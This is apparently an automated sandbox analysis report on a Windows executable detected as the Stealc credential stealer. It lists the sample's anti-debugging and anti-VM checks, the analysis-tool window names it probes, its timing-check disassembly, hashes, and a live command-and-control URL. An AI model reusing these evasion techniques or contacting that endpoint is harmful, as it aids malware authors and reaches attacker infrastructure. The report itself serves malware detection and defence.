                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5990 second address: 12D59BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007F3FAC81C956h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jng 00007F3FAC81C986h 0x0000001a push eax 0x0000001b push edx 0x0000001c jc 00007F3FAC81C956h 0x00000022 jmp 00007F3FAC81C95Ch 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D59BE second address: 12D59D6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F3FACC550E2h 0x00000010 jng 00007F3FACC550D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6033D second address: 4D60343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60343 second address: 4D603F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3FACC550DCh 0x00000009 or eax, 099DF948h 0x0000000f jmp 00007F3FACC550DBh 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F3FACC550E0h 0x00000022 sub si, BBA8h 0x00000027 jmp 00007F3FACC550DBh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F3FACC550E8h 0x00000033 sbb ah, 00000008h 0x00000036 jmp 00007F3FACC550DBh 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov bl, 21h 0x00000041 jmp 00007F3FACC550E0h 0x00000046 popad 0x00000047 xchg eax, ebp 0x00000048 jmp 00007F3FACC550E0h 0x0000004d mov ebp, esp 0x0000004f jmp 00007F3FACC550E0h 0x00000054 pop ebp 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D603F6 second address: 4D603FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D603FA second address: 4D60400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D604E0 second address: 4D604FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FAC81C967h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EF9E5 second address: 11EFA0C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3FACC550E9h 0x00000013 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11E0A96 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 103F6CA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11EB65E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1270667 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00DF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00DEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00DF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00DEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00DF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00DEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DEDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE1160 GetSystemInfo,ExitProcess,0_2_00DE1160
                Source: file.exe, file.exe, 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2254739103.0000000000838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2254739103.0000000000896000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2254739103.0000000000863000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13554
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13551
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13566
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13606
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13571
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE45C0 VirtualProtect ?,00000004,00000100,000000000_2_00DE45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9750 mov eax, dword ptr fs:[00000030h]0_2_00DF9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00DF78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5176, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00DF9600
                Source: file.exe, file.exe, 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: $Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00DF7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00DF7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00DF7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00DF7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.de0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2214050807.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2254739103.0000000000838000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5176, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.de0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2214050807.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2254739103.0000000000838000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5176, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php-file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37pfile.exe, 00000000.00000002.2254739103.000000000081E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.2254739103.000000000081E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php?file.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpifile.exe, 00000000.00000002.2254739103.0000000000884000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1532850
                        Start date and time:2024-10-14 00:59:14 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 82
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.950182278094455
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'854'976 bytes
                        MD5:10f4beb1c5f54bb1d754f56785e14563
                        SHA1:c52cb5d5917e28fd1d886ddbe410bb673617e16c
                        SHA256:58faf6bf840c606c3c8852692bb7f9ae649fa927707f5546d55e68ba6c4fe8b2
                        SHA512:a595988de307c6fe99a42fa547cfc41d4686e33f8fb445687ff54b46460f88d5285c6f35f395239035c1b5d1e3b67ea47a155bc592ae10fe9728cef995510e15
                        SSDEEP:49152:cDa54V0hhKguIpT1cekJAiavfVnjbJC0v:cDaK0qgXB1kcfVjbE0
                        TLSH:D78533A50FBF242CE2C547799C22CF54297A570AFAEB5028B137CFB615706998B3D4C8
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xaa1000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F3FACC4E59Ah
                        cvttps2pi mm3, qword ptr [eax+eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007F3FACC50595h
                        add byte ptr [ebx], cl
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], cl
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        sub byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        pop ds
                        add byte ptr [eax+000000FEh], ah
                        add byte ptr [edx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x22800d7c5746680ebc6e8fbd1bef8f5f9bb95unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
